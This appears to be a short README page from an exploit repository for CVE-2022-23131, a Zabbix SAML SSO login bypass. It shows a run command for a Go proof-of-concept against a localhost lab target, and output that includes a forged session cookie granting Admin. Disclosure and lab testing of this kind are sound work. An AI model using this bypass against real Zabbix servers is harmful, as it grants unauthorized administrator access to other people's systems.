0day/00-CVE_EXP/CVE-2022-23131
2022-03-03 15:15:40 +08:00
..
2022-03-03 14:57:38 +08:00
2022-03-03 15:15:40 +08:00
2022-03-03 14:57:38 +08:00
2022-03-03 14:57:38 +08:00
2022-03-03 14:57:38 +08:00

Zabbix SAML SSO Login Bypass Vulnerability CVE-2022-23131

Environment and Poc of CVE-2022-23131

Environment

Environment setup

Poc

Usage:

go run poc.go check -t http://localhost:8080 -u Admin

[INFO] 2022/02/24 19:49 vul exist! target: http://localhost:8080, cookie: eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiYmYyMzAxMWU1YWMyOWE1MjFlN2E1ZDZjMTAwZDQ2NjAiLCJzaWduIjoiaytKblhjVjlhQmJRa3NJc21oMVRwVEhrMGFDSTJOYkM1VGNTU1doczQ3YVIrNmpWZ1BKOGw5cWZhZlRmcjA3VGVKalNZcW5kZWRPWEtleklmS0Fjb3c9PSJ9